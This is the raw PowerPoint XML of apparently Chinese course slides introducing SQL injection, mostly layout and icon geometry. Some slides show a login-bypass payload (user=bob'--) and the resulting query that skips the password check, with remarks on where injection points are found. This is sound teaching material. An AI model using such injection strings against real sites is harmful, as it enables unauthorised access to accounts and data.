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51"/>
  </p:handoutMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="9228" r:id="rId3"/>
    <p:sldId id="9234" r:id="rId5"/>
    <p:sldId id="9306" r:id="rId6"/>
    <p:sldId id="9307" r:id="rId7"/>
    <p:sldId id="9308" r:id="rId8"/>
    <p:sldId id="9309" r:id="rId9"/>
    <p:sldId id="9310" r:id="rId10"/>
    <p:sldId id="9311" r:id="rId11"/>
    <p:sldId id="9312" r:id="rId12"/>
    <p:sldId id="9313" r:id="rId13"/>
    <p:sldId id="9314" r:id="rId14"/>
    <p:sldId id="9315" r:id="rId15"/>
    <p:sldId id="9316" r:id="rId16"/>
    <p:sldId id="9317" r:id="rId17"/>
    <p:sldId id="9305" r:id="rId18"/>
    <p:sldId id="9319" r:id="rId19"/>
    <p:sldId id="9320" r:id="rId20"/>
    <p:sldId id="9321" r:id="rId21"/>
    <p:sldId id="9322" r:id="rId22"/>
    <p:sldId id="9323" r:id="rId23"/>
    <p:sldId id="9324" r:id="rId24"/>
    <p:sldId id="9325" r:id="rId25"/>
    <p:sldId id="9326" r:id="rId26"/>
    <p:sldId id="9327" r:id="rId27"/>
    <p:sldId id="9328" r:id="rId28"/>
    <p:sldId id="9329" r:id="rId29"/>
    <p:sldId id="9330" r:id="rId30"/>
    <p:sldId id="9331" r:id="rId31"/>
    <p:sldId id="9332" r:id="rId32"/>
    <p:sldId id="9335" r:id="rId33"/>
    <p:sldId id="9334" r:id="rId34"/>
    <p:sldId id="9337" r:id="rId35"/>
    <p:sldId id="9338" r:id="rId36"/>
    <p:sldId id="9339" r:id="rId37"/>
    <p:sldId id="9340" r:id="rId38"/>
    <p:sldId id="9341" r:id="rId39"/>
    <p:sldId id="9342" r:id="rId40"/>
    <p:sldId id="9343" r:id="rId41"/>
    <p:sldId id="9344" r:id="rId42"/>
    <p:sldId id="9346" r:id="rId43"/>
    <p:sldId id="9345" r:id="rId44"/>
    <p:sldId id="9347" r:id="rId45"/>
    <p:sldId id="9349" r:id="rId46"/>
    <p:sldId id="9350" r:id="rId47"/>
    <p:sldId id="9351" r:id="rId48"/>
    <p:sldId id="9352" r:id="rId49"/>
    <p:sldId id="9353" r:id="rId50"/>
  </p:sldIdLst>
  <p:sldSz cx="12858750" cy="7232650"/>
  <p:notesSz cx="6858000" cy="9144000"/>
  <p:custDataLst>
    <p:tags r:id="rId5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6691" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr>
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="69" d="100"/>
          <a:sy n="69" d="100"/>
        </p:scale>
        <p:origin x="1102" y="29"/>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1.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p:cNvGrpSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="-1" y="0"/>
            <a:ext cx="12858243" cy="7232650"/>
            <a:chOff x="-1" y="0"/>
            <a:chExt cx="11520489" cy="6480175"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="16" name="矩形 15"/>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任意多边形: 形状 16"/>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8" name="任意多边形: 形状 17"/>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9" name="任意多边形: 形状 18"/>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64565"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300" indent="-241300" algn="l" defTabSz="964565" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:lnSpc>
          <a:spcPct val="90000"/>
        </a:lnSpc>
        <a:spcBef>
          <a:spcPts val="1055"/>
        </a:spcBef>
        <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
        <a:buChar char="•"/>
        <a:defRPr sz="295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6990" algn="l" defTabSz="964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964879" y="880021"/>
            <a:ext cx="10657184" cy="5324535"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="44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第十一章   </a:t>
            </a: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渗透实战基础</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注入漏洞</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SQLMAP</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盲注</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注入的防御措施</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4400" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4400" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="44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988967" y="2602942"/>
            <a:ext cx="6337525" cy="913943"/>
            <a:chOff x="4628925" y="2772296"/>
            <a:chExt cx="6337525" cy="913943"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="43" name="矩形: 圆角 42"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4628925" y="2772296"/>
              <a:ext cx="6337525" cy="913943"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 9364"/>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8" name="矩形 7"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4875058" y="2829414"/>
              <a:ext cx="5746344" cy="830997"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="120000"/>
                </a:lnSpc>
                <a:defRPr/>
              </a:pP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http://xxxx.com/</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xxx.php?user</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=bob’--&amp;passwd=</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xxxxxx</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2" name="组合 11"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4988966" y="4348117"/>
            <a:ext cx="6337525" cy="913943"/>
            <a:chOff x="4628923" y="4517471"/>
            <a:chExt cx="6337525" cy="913943"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="42" name="矩形: 圆角 41"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4628923" y="4517471"/>
              <a:ext cx="6337525" cy="913943"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 9364"/>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矩形 9"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4887485" y="4574589"/>
              <a:ext cx="5877933" cy="830997"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="120000"/>
                </a:lnSpc>
                <a:defRPr/>
              </a:pP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SELECT * FROM table WHERE user=’bob’--’ and password=’abc123’</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1" name="矩形: 圆角 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1316807" y="2104157"/>
            <a:ext cx="3816426" cy="1912960"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 9364"/>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316807" y="736005"/>
            <a:ext cx="10009112" cy="1080120"/>
            <a:chOff x="2180902" y="1168054"/>
            <a:chExt cx="10009112" cy="1080120"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="24" name="组合 23"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="2180902" y="1168054"/>
              <a:ext cx="10009112" cy="1080120"/>
              <a:chOff x="4197126" y="2392190"/>
              <a:chExt cx="10009112" cy="1080120"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="25" name="矩形 24"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4197126" y="2392190"/>
                <a:ext cx="9664637" cy="936104"/>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6" name="矩形 25"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4341143" y="2536206"/>
                <a:ext cx="9865095" cy="936104"/>
              </a:xfrm>
              <a:prstGeom prst="rect">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5" name="矩形 4"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2540943" y="1426179"/>
              <a:ext cx="9505627" cy="707886"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square">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但是，如果用户发送的请求的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是修改过的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查询，那么这个模式就可能会导致</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注入安全漏洞。</a:t>
              </a:r>
              <a:endPar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7" name="矩形 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1460824" y="2104157"/>
            <a:ext cx="3630259" cy="1938992"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>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例如，如果用户将</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的内容以“</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bob </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来提交，则单引号用于截断前面的字符串，注释符</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后面的内容将会被注释掉，如下所示：</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1316807" y="4291000"/>
            <a:ext cx="3816426" cy="1028179"/>
            <a:chOff x="1316807" y="4291000"/>
            <a:chExt cx="3816426" cy="1028179"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="41" name="矩形: 圆角 40"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1316807" y="4291000"/>
              <a:ext cx="3816426" cy="1028179"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 9364"/>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矩形 8"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1460823" y="4405236"/>
              <a:ext cx="3630259" cy="799706"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="120000"/>
                </a:lnSpc>
                <a:defRPr/>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应用程序会构建并发送下面这条</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查询：</a:t>
              </a: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4" name="矩形 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1316521" y="5572720"/>
            <a:ext cx="10153700" cy="874407"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pP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这样，注释符</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后面的内容将会被完全注释掉，也就是说，对于伪造</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bob</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的用户，并不需求提供正确的密码，就可以查询到</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bob</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的相关信息。</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453648"/>
            <a:ext cx="10657184" cy="1010549"/>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如果要对一个网站进行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注入攻击，首先</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需要找到存在</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注入漏洞的地方，也就是注入点。</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可能的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注入点一般存在于</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登录页面、查找页面或添加页面等用户可以查找或修改数据的地方</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596727" y="875216"/>
            <a:ext cx="2602152" cy="508862"/>
            <a:chOff x="596727" y="875216"/>
            <a:chExt cx="2602152" cy="508862"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="2" name="组合 1"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="596727" y="875216"/>
              <a:ext cx="2602152" cy="508862"/>
              <a:chOff x="1420106" y="1402730"/>
              <a:chExt cx="2602152" cy="508862"/>
            </a:xfrm>
            <a:effectLst>
              <a:outerShdw blurRad="50800" dist="38100" dir="2700000" algn="tl" rotWithShape="0">
                <a:prstClr val="black">
                  <a:alpha val="20000"/>
                </a:prstClr>
              </a:outerShdw>
            </a:effectLst>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="30" name="Round Same Side Corner Rectangle 29"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm rot="5400000">
                <a:off x="2723920" y="673011"/>
                <a:ext cx="508861" cy="196830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p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="2053958" y="1402731"/>
                <a:ext cx="196830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寻找注入点</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24" name="job-search_296984"/>
            <p:cNvSpPr>
              <a:spLocks noChangeAspect="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="806735" y="951326"/>
              <a:ext cx="280358" cy="356639"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 215558 w 476951"/>
                <a:gd name="connsiteY0" fmla="*/ 561042 h 606722"/>
                <a:gd name="connsiteX1" fmla="*/ 215558 w 476951"/>
                <a:gd name="connsiteY1" fmla="*/ 587082 h 606722"/>
                <a:gd name="connsiteX2" fmla="*/ 261304 w 476951"/>
                <a:gd name="connsiteY2" fmla="*/ 587082 h 606722"/>
                <a:gd name="connsiteX3" fmla="*/ 261304 w 476951"/>
                <a:gd name="connsiteY3" fmla="*/ 561042 h 606722"/>
                <a:gd name="connsiteX4" fmla="*/ 329893 w 476951"/>
                <a:gd name="connsiteY4" fmla="*/ 541519 h 606722"/>
                <a:gd name="connsiteX5" fmla="*/ 427908 w 476951"/>
                <a:gd name="connsiteY5" fmla="*/ 541519 h 606722"/>
                <a:gd name="connsiteX6" fmla="*/ 427908 w 476951"/>
                <a:gd name="connsiteY6" fmla="*/ 561066 h 606722"/>
                <a:gd name="connsiteX7" fmla="*/ 329893 w 476951"/>
                <a:gd name="connsiteY7" fmla="*/ 561066 h 606722"/>
                <a:gd name="connsiteX8" fmla="*/ 49043 w 476951"/>
                <a:gd name="connsiteY8" fmla="*/ 541519 h 606722"/>
                <a:gd name="connsiteX9" fmla="*/ 146988 w 476951"/>
                <a:gd name="connsiteY9" fmla="*/ 541519 h 606722"/>
                <a:gd name="connsiteX10" fmla="*/ 146988 w 476951"/>
                <a:gd name="connsiteY10" fmla="*/ 561066 h 606722"/>
                <a:gd name="connsiteX11" fmla="*/ 49043 w 476951"/>
                <a:gd name="connsiteY11" fmla="*/ 561066 h 606722"/>
                <a:gd name="connsiteX12" fmla="*/ 215558 w 476951"/>
                <a:gd name="connsiteY12" fmla="*/ 508875 h 606722"/>
                <a:gd name="connsiteX13" fmla="*/ 215558 w 476951"/>
                <a:gd name="connsiteY13" fmla="*/ 541491 h 606722"/>
                <a:gd name="connsiteX14" fmla="*/ 261304 w 476951"/>
                <a:gd name="connsiteY14" fmla="*/ 541491 h 606722"/>
                <a:gd name="connsiteX15" fmla="*/ 261304 w 476951"/>
                <a:gd name="connsiteY15" fmla="*/ 508875 h 606722"/>
                <a:gd name="connsiteX16" fmla="*/ 369057 w 476951"/>
                <a:gd name="connsiteY16" fmla="*/ 502285 h 606722"/>
                <a:gd name="connsiteX17" fmla="*/ 427908 w 476951"/>
                <a:gd name="connsiteY17" fmla="*/ 502285 h 606722"/>
                <a:gd name="connsiteX18" fmla="*/ 427908 w 476951"/>
                <a:gd name="connsiteY18" fmla="*/ 521832 h 606722"/>
                <a:gd name="connsiteX19" fmla="*/ 369057 w 476951"/>
                <a:gd name="connsiteY19" fmla="*/ 521832 h 606722"/>
                <a:gd name="connsiteX20" fmla="*/ 49043 w 476951"/>
                <a:gd name="connsiteY20" fmla="*/ 502285 h 606722"/>
                <a:gd name="connsiteX21" fmla="*/ 107753 w 476951"/>
                <a:gd name="connsiteY21" fmla="*/ 502285 h 606722"/>
                <a:gd name="connsiteX22" fmla="*/ 107753 w 476951"/>
                <a:gd name="connsiteY22" fmla="*/ 521832 h 606722"/>
                <a:gd name="connsiteX23" fmla="*/ 49043 w 476951"/>
                <a:gd name="connsiteY23" fmla="*/ 521832 h 606722"/>
                <a:gd name="connsiteX24" fmla="*/ 401728 w 476951"/>
                <a:gd name="connsiteY24" fmla="*/ 463192 h 606722"/>
                <a:gd name="connsiteX25" fmla="*/ 427908 w 476951"/>
                <a:gd name="connsiteY25" fmla="*/ 463192 h 606722"/>
                <a:gd name="connsiteX26" fmla="*/ 427908 w 476951"/>
                <a:gd name="connsiteY26" fmla="*/ 482739 h 606722"/>
                <a:gd name="connsiteX27" fmla="*/ 401728 w 476951"/>
                <a:gd name="connsiteY27" fmla="*/ 482739 h 606722"/>
                <a:gd name="connsiteX28" fmla="*/ 49043 w 476951"/>
                <a:gd name="connsiteY28" fmla="*/ 463192 h 606722"/>
                <a:gd name="connsiteX29" fmla="*/ 75082 w 476951"/>
                <a:gd name="connsiteY29" fmla="*/ 463192 h 606722"/>
                <a:gd name="connsiteX30" fmla="*/ 75082 w 476951"/>
                <a:gd name="connsiteY30" fmla="*/ 482739 h 606722"/>
                <a:gd name="connsiteX31" fmla="*/ 49043 w 476951"/>
                <a:gd name="connsiteY31" fmla="*/ 482739 h 606722"/>
                <a:gd name="connsiteX32" fmla="*/ 215558 w 476951"/>
                <a:gd name="connsiteY32" fmla="*/ 456619 h 606722"/>
                <a:gd name="connsiteX33" fmla="*/ 215558 w 476951"/>
                <a:gd name="connsiteY33" fmla="*/ 489235 h 606722"/>
                <a:gd name="connsiteX34" fmla="*/ 261304 w 476951"/>
                <a:gd name="connsiteY34" fmla="*/ 489235 h 606722"/>
                <a:gd name="connsiteX35" fmla="*/ 261304 w 476951"/>
                <a:gd name="connsiteY35" fmla="*/ 456619 h 606722"/>
                <a:gd name="connsiteX36" fmla="*/ 274395 w 476951"/>
                <a:gd name="connsiteY36" fmla="*/ 283744 h 606722"/>
                <a:gd name="connsiteX37" fmla="*/ 293975 w 476951"/>
                <a:gd name="connsiteY37" fmla="*/ 283744 h 606722"/>
                <a:gd name="connsiteX38" fmla="*/ 238440 w 476951"/>
                <a:gd name="connsiteY38" fmla="*/ 339208 h 606722"/>
                <a:gd name="connsiteX39" fmla="*/ 238440 w 476951"/>
                <a:gd name="connsiteY39" fmla="*/ 319653 h 606722"/>
                <a:gd name="connsiteX40" fmla="*/ 274395 w 476951"/>
                <a:gd name="connsiteY40" fmla="*/ 283744 h 606722"/>
                <a:gd name="connsiteX41" fmla="*/ 238440 w 476951"/>
                <a:gd name="connsiteY41" fmla="*/ 228350 h 606722"/>
                <a:gd name="connsiteX42" fmla="*/ 238440 w 476951"/>
                <a:gd name="connsiteY42" fmla="*/ 247880 h 606722"/>
                <a:gd name="connsiteX43" fmla="*/ 202574 w 476951"/>
                <a:gd name="connsiteY43" fmla="*/ 283744 h 606722"/>
                <a:gd name="connsiteX44" fmla="*/ 182905 w 476951"/>
                <a:gd name="connsiteY44" fmla="*/ 283744 h 606722"/>
                <a:gd name="connsiteX45" fmla="*/ 238440 w 476951"/>
                <a:gd name="connsiteY45" fmla="*/ 228350 h 606722"/>
                <a:gd name="connsiteX46" fmla="*/ 238431 w 476951"/>
                <a:gd name="connsiteY46" fmla="*/ 202267 h 606722"/>
                <a:gd name="connsiteX47" fmla="*/ 156828 w 476951"/>
                <a:gd name="connsiteY47" fmla="*/ 283778 h 606722"/>
                <a:gd name="connsiteX48" fmla="*/ 238431 w 476951"/>
                <a:gd name="connsiteY48" fmla="*/ 365378 h 606722"/>
                <a:gd name="connsiteX49" fmla="*/ 320124 w 476951"/>
                <a:gd name="connsiteY49" fmla="*/ 283778 h 606722"/>
                <a:gd name="connsiteX50" fmla="*/ 238431 w 476951"/>
                <a:gd name="connsiteY50" fmla="*/ 202267 h 606722"/>
                <a:gd name="connsiteX51" fmla="*/ 238431 w 476951"/>
                <a:gd name="connsiteY51" fmla="*/ 182623 h 606722"/>
                <a:gd name="connsiteX52" fmla="*/ 339702 w 476951"/>
                <a:gd name="connsiteY52" fmla="*/ 283778 h 606722"/>
                <a:gd name="connsiteX53" fmla="*/ 238431 w 476951"/>
                <a:gd name="connsiteY53" fmla="*/ 384934 h 606722"/>
                <a:gd name="connsiteX54" fmla="*/ 137250 w 476951"/>
                <a:gd name="connsiteY54" fmla="*/ 283778 h 606722"/>
                <a:gd name="connsiteX55" fmla="*/ 238431 w 476951"/>
                <a:gd name="connsiteY55" fmla="*/ 182623 h 606722"/>
                <a:gd name="connsiteX56" fmla="*/ 238431 w 476951"/>
                <a:gd name="connsiteY56" fmla="*/ 150014 h 606722"/>
                <a:gd name="connsiteX57" fmla="*/ 104575 w 476951"/>
                <a:gd name="connsiteY57" fmla="*/ 283765 h 606722"/>
                <a:gd name="connsiteX58" fmla="*/ 134034 w 476951"/>
                <a:gd name="connsiteY58" fmla="*/ 367392 h 606722"/>
                <a:gd name="connsiteX59" fmla="*/ 207993 w 476951"/>
                <a:gd name="connsiteY59" fmla="*/ 413872 h 606722"/>
                <a:gd name="connsiteX60" fmla="*/ 215558 w 476951"/>
                <a:gd name="connsiteY60" fmla="*/ 415649 h 606722"/>
                <a:gd name="connsiteX61" fmla="*/ 215558 w 476951"/>
                <a:gd name="connsiteY61" fmla="*/ 437067 h 606722"/>
                <a:gd name="connsiteX62" fmla="*/ 261304 w 476951"/>
                <a:gd name="connsiteY62" fmla="*/ 437067 h 606722"/>
                <a:gd name="connsiteX63" fmla="*/ 261304 w 476951"/>
                <a:gd name="connsiteY63" fmla="*/ 415649 h 606722"/>
                <a:gd name="connsiteX64" fmla="*/ 268869 w 476951"/>
                <a:gd name="connsiteY64" fmla="*/ 413872 h 606722"/>
                <a:gd name="connsiteX65" fmla="*/ 342917 w 476951"/>
                <a:gd name="connsiteY65" fmla="*/ 367392 h 606722"/>
                <a:gd name="connsiteX66" fmla="*/ 372376 w 476951"/>
                <a:gd name="connsiteY66" fmla="*/ 283765 h 606722"/>
                <a:gd name="connsiteX67" fmla="*/ 238431 w 476951"/>
                <a:gd name="connsiteY67" fmla="*/ 150014 h 606722"/>
                <a:gd name="connsiteX68" fmla="*/ 49043 w 476951"/>
                <a:gd name="connsiteY68" fmla="*/ 84820 h 606722"/>
                <a:gd name="connsiteX69" fmla="*/ 153550 w 476951"/>
                <a:gd name="connsiteY69" fmla="*/ 84820 h 606722"/>
                <a:gd name="connsiteX70" fmla="*/ 153550 w 476951"/>
                <a:gd name="connsiteY70" fmla="*/ 104367 h 606722"/>
                <a:gd name="connsiteX71" fmla="*/ 49043 w 476951"/>
                <a:gd name="connsiteY71" fmla="*/ 104367 h 606722"/>
                <a:gd name="connsiteX72" fmla="*/ 146988 w 476951"/>
                <a:gd name="connsiteY72" fmla="*/ 45656 h 606722"/>
                <a:gd name="connsiteX73" fmla="*/ 179660 w 476951"/>
                <a:gd name="connsiteY73" fmla="*/ 45656 h 606722"/>
                <a:gd name="connsiteX74" fmla="*/ 179660 w 476951"/>
                <a:gd name="connsiteY74" fmla="*/ 65203 h 606722"/>
                <a:gd name="connsiteX75" fmla="*/ 146988 w 476951"/>
                <a:gd name="connsiteY75" fmla="*/ 65203 h 606722"/>
                <a:gd name="connsiteX76" fmla="*/ 49043 w 476951"/>
                <a:gd name="connsiteY76" fmla="*/ 45656 h 606722"/>
                <a:gd name="connsiteX77" fmla="*/ 127371 w 476951"/>
                <a:gd name="connsiteY77" fmla="*/ 45656 h 606722"/>
                <a:gd name="connsiteX78" fmla="*/ 127371 w 476951"/>
                <a:gd name="connsiteY78" fmla="*/ 65203 h 606722"/>
                <a:gd name="connsiteX79" fmla="*/ 49043 w 476951"/>
                <a:gd name="connsiteY79" fmla="*/ 65203 h 606722"/>
                <a:gd name="connsiteX80" fmla="*/ 385459 w 476951"/>
                <a:gd name="connsiteY80" fmla="*/ 33415 h 606722"/>
                <a:gd name="connsiteX81" fmla="*/ 385459 w 476951"/>
                <a:gd name="connsiteY81" fmla="*/ 91359 h 606722"/>
                <a:gd name="connsiteX82" fmla="*/ 443487 w 476951"/>
                <a:gd name="connsiteY82" fmla="*/ 91359 h 606722"/>
                <a:gd name="connsiteX83" fmla="*/ 19580 w 476951"/>
                <a:gd name="connsiteY83" fmla="*/ 19551 h 606722"/>
                <a:gd name="connsiteX84" fmla="*/ 19580 w 476951"/>
                <a:gd name="connsiteY84" fmla="*/ 587082 h 606722"/>
                <a:gd name="connsiteX85" fmla="*/ 195978 w 476951"/>
                <a:gd name="connsiteY85" fmla="*/ 587082 h 606722"/>
                <a:gd name="connsiteX86" fmla="*/ 195978 w 476951"/>
                <a:gd name="connsiteY86" fmla="*/ 430935 h 606722"/>
                <a:gd name="connsiteX87" fmla="*/ 118726 w 476951"/>
                <a:gd name="connsiteY87" fmla="*/ 379657 h 606722"/>
                <a:gd name="connsiteX88" fmla="*/ 84906 w 476951"/>
                <a:gd name="connsiteY88" fmla="*/ 283765 h 606722"/>
                <a:gd name="connsiteX89" fmla="*/ 238431 w 476951"/>
                <a:gd name="connsiteY89" fmla="*/ 130462 h 606722"/>
                <a:gd name="connsiteX90" fmla="*/ 391956 w 476951"/>
                <a:gd name="connsiteY90" fmla="*/ 283765 h 606722"/>
                <a:gd name="connsiteX91" fmla="*/ 358136 w 476951"/>
                <a:gd name="connsiteY91" fmla="*/ 379657 h 606722"/>
                <a:gd name="connsiteX92" fmla="*/ 280884 w 476951"/>
                <a:gd name="connsiteY92" fmla="*/ 430935 h 606722"/>
                <a:gd name="connsiteX93" fmla="*/ 280884 w 476951"/>
                <a:gd name="connsiteY93" fmla="*/ 587082 h 606722"/>
                <a:gd name="connsiteX94" fmla="*/ 457282 w 476951"/>
                <a:gd name="connsiteY94" fmla="*/ 587082 h 606722"/>
                <a:gd name="connsiteX95" fmla="*/ 457282 w 476951"/>
                <a:gd name="connsiteY95" fmla="*/ 110911 h 606722"/>
                <a:gd name="connsiteX96" fmla="*/ 365879 w 476951"/>
                <a:gd name="connsiteY96" fmla="*/ 110911 h 606722"/>
                <a:gd name="connsiteX97" fmla="*/ 365879 w 476951"/>
                <a:gd name="connsiteY97" fmla="*/ 19551 h 606722"/>
                <a:gd name="connsiteX98" fmla="*/ 0 w 476951"/>
                <a:gd name="connsiteY98" fmla="*/ 0 h 606722"/>
                <a:gd name="connsiteX99" fmla="*/ 379674 w 476951"/>
                <a:gd name="connsiteY99" fmla="*/ 0 h 606722"/>
                <a:gd name="connsiteX100" fmla="*/ 476951 w 476951"/>
                <a:gd name="connsiteY100" fmla="*/ 97047 h 606722"/>
                <a:gd name="connsiteX101" fmla="*/ 476951 w 476951"/>
                <a:gd name="connsiteY101" fmla="*/ 606722 h 606722"/>
                <a:gd name="connsiteX102" fmla="*/ 0 w 476951"/>
                <a:gd name="connsiteY102" fmla="*/ 60672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76951" h="606722">
                  <a:moveTo>
                    <a:pt x="215558" y="561042"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="215558" y="587082"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="261304" y="587082"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="261304" y="561042"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="329893" y="541519"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="427908" y="541519"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="427908" y="561066"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="329893" y="561066"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="49043" y="541519"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="146988" y="541519"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="146988" y="561066"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="49043" y="561066"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="215558" y="508875"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="215558" y="541491"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="261304" y="541491"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="261304" y="508875"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="369057" y="502285"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="427908" y="502285"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="427908" y="521832"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="369057" y="521832"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="49043" y="502285"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="107753" y="502285"/>
                  </a:lnTo>
                  <a:lnTo>
